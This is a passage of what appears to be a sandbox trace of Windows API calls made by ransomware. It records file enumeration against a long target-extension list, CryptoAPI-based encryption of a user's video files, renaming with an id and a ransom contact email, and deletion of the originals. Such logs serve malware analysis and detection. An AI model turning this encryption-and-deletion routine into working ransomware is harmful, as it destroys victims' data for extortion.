skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.573] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.573] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.573] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0201.577] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0x123da, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0x123da, lpOverlapped=0x0) returned 1
	[0201.581] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.582] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb2a8) returned 1
	[0201.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.584] CryptCreateHash (in: hProv=0xfcb2a8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0201.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.584] CryptHashData (hHash=0xfb9030, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.584] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.584] CryptDeriveKey (in: hProv=0xfcb2a8, Algid=0x6610, hBaseData=0xfb9030, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9330) returned 1
	[0201.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.585] CryptEncrypt (in: hKey=0xfb9330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x123da, dwBufLen=0x123da | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x123e0) returned 1
	[0201.587] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.587] RtlMoveMemory (in: Destination=0xff3588, Source=0xfe11a0, Length=0x123da | out: Destination=0xff3588) 
	[0201.587] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.587] CryptEncrypt (in: hKey=0xfb9330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff3588*, pdwDataLen=0x1894dc*=0x123da, dwBufLen=0x123e0 | out: pbData=0xff3588*, pdwDataLen=0x1894dc*=0x123e0) returned 1
	[0201.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.589] CryptDestroyKey (hKey=0xfb9330) returned 1
	[0201.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.589] CryptDestroyHash (hHash=0xfb9030) returned 1
	[0201.589] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.590] CryptReleaseContext (hProv=0xfcb2a8, dwFlags=0x0) returned 1
	[0201.590] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.590] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.591] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.591] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0201.592] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 125
	[0201.593] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.593] WriteFile (in: hFile=0x32c, lpBuffer=0xff3588*, nNumberOfBytesToWrite=0x123e0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xff3588*, lpNumberOfBytesWritten=0x189938*=0x123e0, lpOverlapped=0x0) returned 1
	[0201.600] CloseHandle (hObject=0x32c) returned 1
	[0201.600] CloseHandle (hObject=0x390) returned 1
	[0201.600] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4")) returned 1
	[0201.609] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\7v2v.mp4")) returned 0
	[0201.609] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a31d990, ftCreationTime.dwHighDateTime=0x1d96ff2, ftLastAccessTime.dwLowDateTime=0xebf5d410, ftLastAccessTime.dwHighDateTime=0x1d971a1, ftLastWriteTime.dwLowDateTime=0xebf5d410, ftLastWriteTime.dwHighDateTime=0x1d971a1, nFileSizeHigh=0x0, nFileSizeLow=0xa1e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8B i.swf", cAlternateFileName="8BI~1.SWF")) returned 1
	[0201.609] lstrcmpW (lpString1="8B i.swf", lpString2="..") returned 1
	[0201.609] lstrcmpW (lpString1="8B i.swf", lpString2=".") returned 1
	[0201.609] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\"
	[0201.610] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\", lpString2="8B i.swf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\8B i.swf") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\8B i.swf"
	[0201.610] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\8B i.swf") returned 83
	[0201.610] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0201.610] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\a-_m2\\8B i.swf", cchLength=0x53 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf") returned 0x53
	[0201.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.612] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf", lpSrch="help_decrypt_your_files") returned 0x0
	[0201.612] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf") returned="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf"
	[0201.613] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf") returned 83
	[0201.613] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.613] StrStrW (lpFirst=".swf", lpSrch=".") returned=".swf"
	[0201.613] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0201.613] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".swf") returned=".swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0201.614] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0201.614] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0201.614] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0201.618] ReadFile (in: hFile=0x390, lpBuffer=0xfe11a0, nNumberOfBytesToRead=0xa1e0, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfe11a0*, lpNumberOfBytesRead=0x189930*=0xa1e0, lpOverlapped=0x0) returned 1
	[0201.621] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.621] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcac48) returned 1
	[0201.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.623] CryptCreateHash (in: hProv=0xfcac48, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0201.623] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.624] CryptHashData (hHash=0xfb8eb0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0201.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.624] CryptDeriveKey (in: hProv=0xfcac48, Algid=0x6610, hBaseData=0xfb8eb0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb93b0) returned 1
	[0201.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.624] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0xa1e0, dwBufLen=0xa1e0 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0xa1f0) returned 1
	[0201.625] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.626] RtlMoveMemory (in: Destination=0xfeb388, Source=0xfe11a0, Length=0xa1e0 | out: Destination=0xfeb388) 
	[0201.626] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.626] CryptEncrypt (in: hKey=0xfb93b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfeb388*, pdwDataLen=0x1894dc*=0xa1e0, dwBufLen=0xa1f0 | out: pbData=0xfeb388*, pdwDataLen=0x1894dc*=0xa1f0) returned 1
	[0201.645] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.645] CryptDestroyKey (hKey=0xfb93b0) returned 1
	[0201.645] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.646] CryptDestroyHash (hHash=0xfb8eb0) returned 1
	[0201.646] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.646] CryptReleaseContext (hProv=0xfcac48, dwFlags=0x0) returned 1
	[0201.646] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0201.646] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0201.647] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0201.647] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0201.648] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 125
	[0201.648] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x32c
	[0201.649] WriteFile (in: hFile=0x32c, lpBuffer=0xfeb388*, nNumberOfBytesToWrite=0xa1f0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfeb388*, lpNumberOfBytesWritten=0x189938*=0xa1f0, lpOverlapped=0x0) returned 1
	[0201.653] CloseHandle (hObject=0x32c) returned 1
	[0201.653] CloseHandle (hObject=0x390) returned 1
	[0201.654] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\a-_m2\\8b i.swf")) returned 1
